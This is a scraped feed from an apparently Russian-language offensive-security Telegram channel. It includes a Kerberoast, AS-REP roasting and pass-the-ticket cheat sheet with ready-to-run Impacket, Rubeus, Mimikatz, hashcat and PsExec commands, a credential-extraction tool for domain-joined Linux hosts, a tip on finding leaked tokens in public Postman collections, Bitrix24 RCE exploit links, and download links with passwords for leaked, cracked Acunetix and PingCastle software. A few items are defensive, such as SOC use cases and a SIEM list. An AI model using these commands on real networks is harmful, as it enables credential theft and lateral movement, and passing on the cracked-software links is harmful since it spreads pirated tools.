Pentester's Backlog
592 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Волосатый бублик
#linux #ad #mimikatz

[ linikatzV2 ]

Post-exploitation tool for Unix machines attached to a Windows active directory, based on Tim (Wadhwa-)Brown Linikatz tool.
It extracts domain secrets from compromised machines, such as :
— User and machine hashes (SHA-512)
— Machine hash (NTLM) and AES keys
— Kerberos tickets
— Clear text passwords.

This tool needs root privileges to be run on the host system.

Author: 4zrm

https://github.com/Orange-Cyberdefense/LinikatzV2
Мало кто знает, что для осинта можно использовать поиск коллекций в Postman. Часто разработчики оставляют публичные репозитории, содержащие в себе как описание всех API ручек, так и токены авторизации, пароли от админок и бд, сертификаты.

https://www.postman.com/search?q=%D0%B1%D0%B4&scope=all&type=all
👍1
Forwarded from Pwn3rzs
Acunetix Windows v23.9.231020153 - 23 Oct 2023

Download
: https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.9.231020153-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs

NOTE:
The installer was leaked on our chat and then immediately deleted, so we still consider it a valid leak.

NOTE 2:
Stop begging/ asking for Linux version, until a leak happens, we can't release it

Enjoy!
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou

➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
🔥 Bitrix24 Multiple Vulnerabilities

Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.

🌐 Details and PoC's:

🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)

#bitrix24 #rce #xss #dos #idor
Список Топ10 сценариев (use cases), которые необходимо использовать в SOC, который мониторит АСУ ТП. Это не значит, что не надо мониторить все остальное; просто с этого стоит начинать.
Немного дефенса!

10 Open-Source SIEM-систем
💊2
Forwarded from sdnv's funk-hole
Media is too big
VIEW IN TELEGRAM
Доклад в УрФУ на тему Kerberos от Миши из RedTeam Brazzers.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
👍1
Forwarded from Pwn3rzs
PingCastle Pro (No Server Side) 3.1.0.1

Down : https://mir.cr/0JECBXGW
Passw : 20231109_1912


Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
#pentest #web

Nuclei + Wordfence = 💗
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.

Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!

💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Pavel Shlundin)
Как и в том году мой бывший коллега со своей командой CTI создали новый огромный отчёт. На этот раз про азиатским APT группировки!
Отчёт содержит 370 страниц подробного анализа о различных азиатских APT группировок с описанием TTPs, анализом действий атакующих на основе "Unified Kill Chain" и много других крутых штук, отчёт доступен для скачивания в RU и EN вариантах.

P.S. Данный материал на 14:00 по мск эксклюзив.
🔥1